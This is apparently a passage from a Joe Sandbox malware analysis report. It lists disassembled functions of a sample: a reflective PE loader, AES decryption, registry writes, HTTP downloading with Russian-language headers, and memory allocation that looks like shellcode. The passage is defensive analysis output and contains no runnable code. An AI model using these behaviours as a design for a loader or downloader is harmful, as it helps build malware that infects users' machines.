                                                  • Part of subcall function 00409C3B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C45
                                                  • Part of subcall function 00409C3B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C78
                                                  • Part of subcall function 00409C3B: RtlWakeAllConditionVariable.NTDLL ref: 00409CEF
                                                  • Part of subcall function 004021F0: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00402226
                                                  • Part of subcall function 004021F0: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402247
                                                  • Part of subcall function 004021F0: CloseHandle.KERNEL32(00000000), ref: 0040224E
                                                • __Init_thread_footer.LIBCMT ref: 00404202
                                                  • Part of subcall function 00409C85: EnterCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409C90
                                                  • Part of subcall function 00409C85: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409CCD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Init_thread_footer$CriticalSection$CreateFileUninitialize$EnterLeavePathSleepTime$ByteCharCloseConditionDirectoryFolderHandleInitializeInstanceMultiSystemTempUnothrow_t@std@@@VariableWakeWideWrite__ehfuncinfo$??2@
                                                • String ID: KDOX$SUB=$]DFE$^OX*$get$viFO
                                                • API String ID: 995133137-4208347134
                                                • Opcode ID: 2b5074e5ae3f74629323bde4956dacc6f2b5a6a8a3ea0f745ae83f81f010b08c
                                                • Instruction ID: 2a7656185698f67e8fe61b04cbca63a222de47e8cf16a67dea48f36782a400ee
                                                • Opcode Fuzzy Hash: 2b5074e5ae3f74629323bde4956dacc6f2b5a6a8a3ea0f745ae83f81f010b08c
                                                • Instruction Fuzzy Hash: 7BF2D1B0E042188BDB24DF24CC49B9EBBB1EF45304F5441E9E5097B2D2DB78AA85CF59
                                                Function 00404F50 Relevance: 40.1, APIs: 16, Strings: 6, Instructions: 1645sleepregistryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004107E2: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A7F,00000000,024FEF0D), ref: 004107F7
                                                  • Part of subcall function 004107E2: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410816
                                                  • Part of subcall function 00409C85: EnterCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409C90
                                                  • Part of subcall function 00409C85: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409CCD
                                                • __Init_thread_footer.LIBCMT ref: 004050BD
                                                • Sleep.KERNEL32(00000BB8,00000000,?,00406A81,0041D8A0,0042DB20,0042DB21), ref: 004052D5
                                                • __Init_thread_footer.LIBCMT ref: 004053CB
                                                • Sleep.KERNEL32(000007D0), ref: 00405735
                                                • Sleep.KERNEL32(000007D0), ref: 0040574F
                                                • CoUninitialize.OLE32(?,?,0042DB3D,?,?,?,?,?,?,?,?,?,?,00000000,0042DB21), ref: 00405785
                                                • CoUninitialize.OLE32(?,?,?,?,?,0042DB3D,?,?,?,?,?,?,?), ref: 004057B1
                                                • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405903
                                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 00405925
                                                • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 0040594D
                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405956
                                                • Sleep.KERNEL32(000005DC), ref: 00405A90
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Sleep$CriticalInit_thread_footerSectionTimeUninitialize$CloseCreateEnterFileLeaveOpenSystemUnothrow_t@std@@@Value__ehfuncinfo$??2@
                                                • String ID: DFEK$SUB=$get$mixone$updateSW$U%
                                                • API String ID: 606935701-3680244588
                                                • Opcode ID: 4db77f0429fbeff6bc7245b50d1839831cba9557f07ad327e6d61b565521e7f7
                                                • Instruction ID: 0d5b8b6ccd7ac2cce54ba59243f10dcebe2db4c82d63bd9967a8cdfa7b9099a4
                                                • Opcode Fuzzy Hash: 4db77f0429fbeff6bc7245b50d1839831cba9557f07ad327e6d61b565521e7f7
                                                • Instruction Fuzzy Hash: F5D20471D001148BDB14EB24CC597AEBB75AF01308F5481BEE8097B2D2DB78AE85CF99
                                                Function 00402EC0 Relevance: 35.5, APIs: 11, Strings: 9, Instructions: 454COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2198 402ec0-402ede 2199 402ee0-402f07 SetLastError call 4029f0 call 4099d7 2198->2199 2200 402f08-402f10 2198->2200 2202 402f12 2200->2202 2203 402f3d-402f47 2200->2203 2207 402f17-402f3c call 4029f0 SetLastError call 4099d7 2202->2207 2204 402f71-402f7f 2203->2204 2205 402f49-402f70 SetLastError call 4029f0 call 4099d7 2203->2205 2209 402f81-402f86 2204->2209 2210 402f88-402f91 2204->2210 2209->2207 2215 402f93-402f98 2210->2215 2216 402f9d-402fa5 2210->2216 2215->2207 2219 402fb1-402fbe 2216->2219 2220 402fa7-402fac 2216->2220 2223 402fc0-402fc2 2219->2223 2224 402fe7-40300a GetNativeSystemInfo 2219->2224 2220->2207 2228 402fc5-402fcc 2223->2228 2226 403016-40302e VirtualAlloc 2224->2226 2227 40300c-403011 2224->2227 2229 403030-403040 VirtualAlloc 2226->2229 2230 403056-403075 HeapAlloc 2226->2230 2227->2207 2231 402fd3 2228->2231 2232 402fce-402fd1 2228->2232 2229->2230 2234 403042-40304f call 4029f0 2229->2234 2239 403077-403084 VirtualFree 2230->2239 2240 40308b-4030d1 2230->2240 2233 402fd5-402fe2 2231->2233 2232->2233 2233->2228 2235 402fe4 2233->2235 2234->2230 2235->2224 2239->2240 2241 4030d7-4030d9 SetLastError 2240->2241 2242 40316f-4031b9 VirtualAlloc call 40afb0 2240->2242 2243 4030df-4030e3 2241->2243 2249 40326d-403278 2242->2249 2250 4031bf 2242->2250 2245 4030e5-4030f2 2243->2245 2246 4030f6-403106 call 40fab8 2243->2246 2245->2246 2257 403135-40313a 2246->2257 2258 403108-40310d 2246->2258 2251 4032fd 2249->2251 2252 40327e-403285 2249->2252 2254 4031c2-4031c7 2250->2254 2259 403302-40330e call 402cd0 2251->2259 2255 403287-403289 2252->2255 2256 40328e-4032a0 2252->2256 2260 403206-40320e 2254->2260 2261 4031c9-4031d1 2254->2261 2255->2259 2256->2251 2266 4032a2-4032b7 2256->2266 2264 40313c-40314c 2257->2264 2265 40314f-40316e HeapFree call 4099d7 2257->2265 2268 40312c-403132 call 40fab8 2258->2268 2269 40310f 2258->2269 2259->2243 2286 403314-403316 call 402b50 2259->2286 2260->2241 2267 403214-403227 call 402e30 2260->2267 2262 403252-403264 2261->2262 2263 4031d3-4031ed 2261->2263 2262->2254 2275 40326a 2262->2275 2263->2243 2288 4031f3-403204 call 40b530 2263->2288 2264->2265 2271 4032b9-4032bc 2266->2271 2272 4032ee-4032f8 2266->2272 2282 403229-40322e 2267->2282 2268->2257 2273 403110-403115 2269->2273 2280 4032c0-4032d1 2271->2280 2272->2266 2283 4032fa 2272->2283 2284 403126-40312a 2273->2284 2285 403117-403123 2273->2285 2275->2249 2289 4032d3-4032db 2280->2289 2290 4032de-4032ec 2280->2290 2282->2243 2292 403234-403249 call 40afb0 2282->2292 2283->2251 2284->2268 2284->2273 2285->2284 2293 40331b-40331d 2286->2293 2303 40324c-40324f 2288->2303 2289->2290 2290->2272 2290->2280 2292->2303 2293->2243 2298 403323-40332d 2293->2298 2301 403351-403358 2298->2301 2302 40332f-403338 2298->2302 2305 4033aa-4033c3 call 4099d7 2301->2305 2306 40335a-403363 2301->2306 2302->2301 2304 40333a-40333e 2302->2304 2303->2262 2304->2301 2307 403340-40334f 2304->2307 2309 403394-4033a9 call 4099d7 2306->2309 2310 403365-40336e 2306->2310 2307->2301 2316 403370 2310->2316 2317 40337a-403393 call 4099d7 2310->2317 2316->2317
                                                APIs
                                                • SetLastError.KERNEL32(0000000D), ref: 00402EE2
                                                • SetLastError.KERNEL32(000000C1), ref: 00402F24
                                                Strings
                                                • p.@P.@0.@, xrefs: 004030C5
                                                • ERROR_OUTOFMEMORY!, xrefs: 00403042
                                                • DOS header size is not valid!, xrefs: 00402F51
                                                • FileHeader.Machine != HOST_MACHINE!, xrefs: 00402F93
                                                • Size is not valid!, xrefs: 00402EE8
                                                • DOS header is not valid!, xrefs: 00402F12
                                                • Signature != IMAGE_NT_SIGNATURE!, xrefs: 00402F81
                                                • Section alignment invalid!, xrefs: 00402FA7
                                                • alignedImageSize != AlignValueUp!, xrefs: 0040300C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: ErrorLast
                                                • String ID: DOS header is not valid!$DOS header size is not valid!$ERROR_OUTOFMEMORY!$FileHeader.Machine != HOST_MACHINE!$Section alignment invalid!$Signature != IMAGE_NT_SIGNATURE!$Size is not valid!$alignedImageSize != AlignValueUp!$p.@P.@0.@
                                                • API String ID: 1452528299-2075088523
                                                • Opcode ID: 93a66e001e3ee66e65f00ee5565e1e2522c51b5cf1621d66301cec4e888181c2
                                                • Instruction ID: 9256140b0f890bfcd87a01f3051d579660d3e2dc250f0df49545701e60f9fd82
                                                • Opcode Fuzzy Hash: 93a66e001e3ee66e65f00ee5565e1e2522c51b5cf1621d66301cec4e888181c2
                                                • Instruction Fuzzy Hash: CCF1CE71B002059BCB10CFA9D985BAAB7B4BF48305F14417AE909EB3C2D779ED11CB98
                                                Function 004035B0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 225encryptionCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2391 4035b0-403638 CryptAcquireContextW 2392 4036fa-403710 GetLastError CryptReleaseContext 2391->2392 2393 40363e-40365c CryptCreateHash 2391->2393 2395 403844-40384a 2392->2395 2393->2392 2394 403662-403675 2393->2394 2398 403678-40367d 2394->2398 2396 403874-403891 call 4099d7 2395->2396 2397 40384c-403858 2395->2397 2399 40386a-403871 call 409b3c 2397->2399 2400 40385a-403868 2397->2400 2398->2398 2401 40367f-4036c6 call 409b4a call 40fcdf CryptHashData 2398->2401 2399->2396 2400->2399 2403 403892-4038a5 call 40cfaf 2400->2403 2415 4036d6-4036f8 CryptDeriveKey 2401->2415 2416 4036c8-4036d1 GetLastError 2401->2416 2413 4038a7-4038ae 2403->2413 2414 4038b8 2403->2414 2413->2414 2420 4038b0-4038b4 2413->2420 2415->2392 2417 403715-403716 call 40fb0d 2415->2417 2416->2395 2421 40371b-403767 call 40afb0 call 409b4a 2417->2421 2420->2414 2426 403838-40383e CryptDestroyKey 2421->2426 2427 40376d-40377c 2421->2427 2426->2395 2428 403782-40378b 2427->2428 2429 403799-4037d4 call 40afb0 CryptDecrypt 2428->2429 2430 40378d-40378f 2428->2430 2429->2426 2433 4037d6-403801 call 40afb0 2429->2433 2430->2429 2433->2426 2436 403803-403832 2433->2436 2436->2426 2436->2428
                                                APIs
                                                • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,024FEF0D), ref: 00403630
                                                • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00403654
                                                • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 004036BE
                                                • GetLastError.KERNEL32 ref: 004036C8
                                                • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 004036F0
                                                • GetLastError.KERNEL32 ref: 004036FA
                                                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040370A
                                                • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 004037CC
                                                • CryptDestroyKey.ADVAPI32(?), ref: 0040383E
                                                Strings
                                                • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 0040360C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease
                                                • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                                • API String ID: 3761881897-63410773
                                                • Opcode ID: 7f6218a34b9754140a9e9fc40106ac4304b7aaa720599af0eabc3a8fdf2c6258
                                                • Instruction ID: 8181a1f98bd0149a833479ac616fd79743055c61a592a1420c0c523c4d9566d8
                                                • Opcode Fuzzy Hash: 7f6218a34b9754140a9e9fc40106ac4304b7aaa720599af0eabc3a8fdf2c6258
                                                • Instruction Fuzzy Hash: 37819171A00218AFEF209F25CC45B9ABBB9FF45300F0081BAF90DA7291DB359E858F55
                                                Function 00402A20 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 113memorywindowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2437 402a20-402a37 2438 402a79-402a8d call 4099d7 2437->2438 2439 402a39-402a42 2437->2439 2440 402a44-402a49 2439->2440 2441 402a8e-402ad0 VirtualProtect 2439->2441 2440->2438 2443 402a4b-402a50 2440->2443 2441->2438 2445 402ad2-402af4 GetLastError FormatMessageA 2441->2445 2446 402a52-402a5a 2443->2446 2447 402a66-402a73 call 402e50 2443->2447 2448 402af7-402afc 2445->2448 2446->2447 2449 402a5c-402a64 2446->2449 2452 402a75 2447->2452 2448->2448 2450 402afe-402b4a LocalAlloc call 4029b0 OutputDebugStringA LocalFree * 2 call 4099d7 2448->2450 2449->2447 2451 402a78 2449->2451 2451->2438 2452->2451
                                                APIs
                                                • VirtualProtect.KERNEL32(?,?,?,?), ref: 00402AC8
                                                • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 00402ADD
                                                • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 00402AEB
                                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 00402B06
                                                • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 00402B25
                                                • LocalFree.KERNEL32(00000000), ref: 00402B32
                                                • LocalFree.KERNEL32(?), ref: 00402B37
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Local$Free$AllocDebugErrorFormatLastMessageOutputProtectStringVirtual
                                                • String ID: %s: %s$Error protecting memory page
                                                • API String ID: 839691724-1484484497
                                                • Opcode ID: f25455ec320cf7d64a2bc5a19560f05570590d079a315ae6df6c255a1a5fbc21
                                                • Instruction ID: 0c0000675eadf2e66051917e59d7aa22c0aaa2fc97c5d5fe75df83e4770fcd9e
                                                • Opcode Fuzzy Hash: f25455ec320cf7d64a2bc5a19560f05570590d079a315ae6df6c255a1a5fbc21
                                                • Instruction Fuzzy Hash: 4B310731B00104AFDB10DF68DD44FAAB768EF48704F0541BEE905AB2D2DB75AE06CB98
                                                Function 00401940 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 293networkfileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2630 401940-401a18 InternetSetFilePointer InternetReadFile 2632 401a50-401a9d call 40b530 HttpQueryInfoA 2630->2632 2636 401aa3-401ad6 CoCreateInstance 2632->2636 2637 401dea-401e16 call 4099d7 2632->2637 2636->2637 2638 401adc-401ae3 2636->2638 2638->2637 2640 401ae9-401b06 2638->2640 2642 401b10-401b15 2640->2642 2642->2642 2643 401b17-401bde call 402730 call 4015e0 2642->2643 2651 401be0-401bef 2643->2651 2652 401c0f-401c11 2643->2652 2655 401bf1-401bff 2651->2655 2656 401c05-401c0c call 409b3c 2651->2656 2653 401c17-401c1e 2652->2653 2654 401dde-401de5 2652->2654 2653->2654 2659 401c24-401c9a call 409b4a 2653->2659 2654->2637 2655->2656 2657 401e19-401e1f call 40cfaf 2655->2657 2656->2652 2666 401ca0-401cb4 2659->2666 2667 401dc4-401dda call 4099e5 2659->2667 2669 401cba-401ce9 call 409b4a 2666->2669 2670 401d5e-401d75 2666->2670 2667->2654 2681 401d4a-401d5b call 4099e5 2669->2681 2682 401ceb-401ced 2669->2682 2671 401d77-401d79 2670->2671 2672 401dba-401dc2 2670->2672 2675 401d88-401d8a 2671->2675 2676 401d7b-401d86 call 40d09d 2671->2676 2672->2667 2679 401d8c-401d9c call 40afb0 2675->2679 2680 401d9e-401daf call 40b530 call 40d09d 2675->2680 2692 401db5 call 40cf9f 2676->2692 2679->2672 2680->2692 2681->2670 2687 401d05-401d1d call 40b530 2682->2687 2688 401cef-401cf1 2682->2688 2700 401d2c-401d38 2687->2700 2701 401d1f-401d2a call 40d09d 2687->2701 2688->2687 2689 401cf3-401d03 call 40afb0 2688->2689 2689->2681 2692->2672 2700->2681 2704 401d3a-401d3f call 40d09d 2700->2704 2707 401d45 call 40cf9f 2701->2707 2704->2707 2707->2681
                                                APIs
                                                • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 004019D5
                                                • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 004019F8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: FileInternet$PointerRead
                                                • String ID: text
                                                • API String ID: 3197321146-999008199
                                                • Opcode ID: 5d2b67920e7965021a67acd32ea28e335973d0b9692ae9a2ead62ee0d6d92aa5
                                                • Instruction ID: 0125e10c814f2167b0c83c61a86ba883da1fe49b2781431745f5a2561ed14111
                                                • Opcode Fuzzy Hash: 5d2b67920e7965021a67acd32ea28e335973d0b9692ae9a2ead62ee0d6d92aa5
                                                • Instruction Fuzzy Hash: FAC15B709002189FDB24DF64CC85BD9B7B5EF49304F1041EAE509B72A1D778AE94CF99
                                                Function 00F6D106 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 3616 f6d106-f6d11f 3617 f6d121-f6d123 3616->3617 3618 f6d125 3617->3618 3619 f6d12a-f6d136 CreateToolhelp32Snapshot 3617->3619 3618->3619 3620 f6d146-f6d153 Module32First 3619->3620 3621 f6d138-f6d13e 3619->3621 3622 f6d155-f6d156 call f6cdc5 3620->3622 3623 f6d15c-f6d164 3620->3623 3621->3620 3628 f6d140-f6d144 3621->3628 3626 f6d15b 3622->3626 3626->3623 3628->3617 3628->3620
                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00F6D12E
                                                • Module32First.KERNEL32(00000000,00000224), ref: 00F6D14E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2878196099.0000000000F6C000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F6C000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f6c000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                                • String ID:
                                                • API String ID: 3833638111-0
                                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                • Instruction ID: cb750a258ba939d2cfd1ff35cd4ffb1700b0927956cb05e2c040d439c5747031
                                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                • Instruction Fuzzy Hash: 9FF06232A007146BE7203AF5988DBAA76F8AF8A735F100528E642910C0DAB4E8459A61
                                                Function 00408770 Relevance: 2.5, Strings: 2, Instructions: 27COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: emp$mixtwo
                                                • API String ID: 3472027048-2390925073
                                                • Opcode ID: 25b80a3ffdd21913e586197d89a1d0a7f06881a9f76e4fd5286830887ded5122
                                                • Instruction ID: d670b023532553bde9b5cd74a18030282768016b503e3e09e149c4df20b712b6
                                                • Opcode Fuzzy Hash: 25b80a3ffdd21913e586197d89a1d0a7f06881a9f76e4fd5286830887ded5122
                                                • Instruction Fuzzy Hash: 15F01CB161430457E7147F65ED1B7173EA4970271CFA006ADD8141F2C2E7FB861A8BE6
                                                Function 10001523 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 192networkCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 1000152A
                                                • __cftof.LIBCMT ref: 10001624
                                                • InternetOpenA.WININET(?,?,?,00000000,00000000), ref: 1000163D
                                                • InternetSetOptionA.WININET(00000000,00000041,?,00000004), ref: 10001660
                                                • InternetConnectA.WININET(00000000,?,00000050,?,?,00000003,00000000,00000001), ref: 10001680
                                                • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,80400000,00000001), ref: 100016B0
                                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 100016C9
                                                • InternetCloseHandle.WININET(00000000), ref: 100016E0
                                                • InternetCloseHandle.WININET(00000000), ref: 100016E3
                                                • InternetCloseHandle.WININET(00000000), ref: 100016E9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectH_prolog3_OptionSend__cftof
                                                • String ID: GET$http://
                                                • API String ID: 1233269984-1632879366
                                                • Opcode ID: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
                                                • Instruction ID: 7cfd31fe4164df5669dc4f011f358c4066a4bf273ac9d15a63e71752a24e0b34
                                                • Opcode Fuzzy Hash: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
                                                • Instruction Fuzzy Hash: D5518F75E01618EBEB11CBE4CC85EEEB7B9EF48340F508114FA11BB189D7B49A45CBA0
                                                Function 00401800 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 106networkCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401873
                                                • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401899
                                                • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018BF
                                                  • Part of subcall function 00402470: Concurrency::cancel_current_task.LIBCPMT ref: 00402599
                                                • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018E5
                                                Strings
                                                • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 00401877
                                                • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 004018C3
                                                • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 0040189D
                                                • text, xrefs: 00401B5F
                                                • http://, xrefs: 00401EC4, 004021A3
                                                • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 00401832
                                                • GET, xrefs: 004020B7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: HeadersHttpRequest$Concurrency::cancel_current_task
                                                • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$http://$text
                                                • API String ID: 2146599340-4172842843
                                                • Opcode ID: 63080466dd17a9b8a4ff43f685a9b199d52acbea20d3452c9180351abca4782c
                                                • Instruction ID: d9449a1bc553b4f7263359658e85a8d5597bae1f9675cad689ed873ec2693fe7
                                                • Opcode Fuzzy Hash: 63080466dd17a9b8a4ff43f685a9b199d52acbea20d3452c9180351abca4782c
                                                • Instruction Fuzzy Hash: A4316371D00109AFEB14DBE9CC85FEEB7B9EB08714F60812AE521731C0C7789945CBA4
                                                Function 04B6003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2458 4b6003c-4b60047 2459 4b6004c-4b60263 call 4b60a3f call 4b60e0f call 4b60d90 VirtualAlloc 2458->2459 2460 4b60049 2458->2460 2475 4b60265-4b60289 call 4b60a69 2459->2475 2476 4b6028b-4b60292 2459->2476 2460->2459 2481 4b602ce-4b603c2 VirtualProtect call 4b60cce call 4b60ce7 2475->2481 2478 4b602a1-4b602b0 2476->2478 2480 4b602b2-4b602cc 2478->2480 2478->2481 2480->2478 2487 4b603d1-4b603e0 2481->2487 2488 4b603e2-4b60437 call 4b60ce7 2487->2488 2489 4b60439-4b604b8 VirtualFree 2487->2489 2488->2487 2490 4b605f4-4b605fe 2489->2490 2491 4b604be-4b604cd 2489->2491 2495 4b60604-4b6060d 2490->2495 2496 4b6077f-4b60789 2490->2496 2494 4b604d3-4b604dd 2491->2494 2494->2490 2500 4b604e3-4b60505 LoadLibraryA 2494->2500 2495->2496 2501 4b60613-4b60637 2495->2501 2498 4b607a6-4b607b0 2496->2498 2499 4b6078b-4b607a3 2496->2499 2502 4b607b6-4b607cb 2498->2502 2503 4b6086e-4b608be LoadLibraryA 2498->2503 2499->2498 2504 4b60517-4b60520 2500->2504 2505 4b60507-4b60515 2500->2505 2506 4b6063e-4b60648 2501->2506 2507 4b607d2-4b607d5 2502->2507 2510 4b608c7-4b608f9 2503->2510 2508 4b60526-4b60547 2504->2508 2505->2508 2506->2496 2509 4b6064e-4b6065a 2506->2509 2511 4b607d7-4b607e0 2507->2511 2512 4b60824-4b60833 2507->2512 2513 4b6054d-4b60550 2508->2513 2509->2496 2514 4b60660-4b6066a 2509->2514 2515 4b60902-4b6091d 2510->2515 2516 4b608fb-4b60901 2510->2516 2517 4b607e4-4b60822 2511->2517 2518 4b607e2 2511->2518 2522 4b60839-4b6083c 2512->2522 2519 4b60556-4b6056b 2513->2519 2520 4b605e0-4b605ef 2513->2520 2521 4b6067a-4b60689 2514->2521 2516->2515 2517->2507 2518->2512 2523 4b6056f-4b6057a 2519->2523 2524 4b6056d 2519->2524 2520->2494 2525 4b60750-4b6077a 2521->2525 2526 4b6068f-4b606b2 2521->2526 2522->2503 2527 4b6083e-4b60847 2522->2527 2529 4b6057c-4b60599 2523->2529 2530 4b6059b-4b605bb 2523->2530 2524->2520 2525->2506 2531 4b606b4-4b606ed 2526->2531 2532 4b606ef-4b606fc 2526->2532 2533 4b6084b-4b6086c 2527->2533 2534 4b60849 2527->2534 2541 4b605bd-4b605db 2529->2541 2530->2541 2531->2532 2535 4b606fe-4b60748 2532->2535 2536 4b6074b 2532->2536 2533->2522 2534->2503 2535->2536 2536->2521 2541->2513
                                                APIs
                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 04B6024D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID: cess$kernel32.dll
                                                • API String ID: 4275171209-1230238691
                                                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
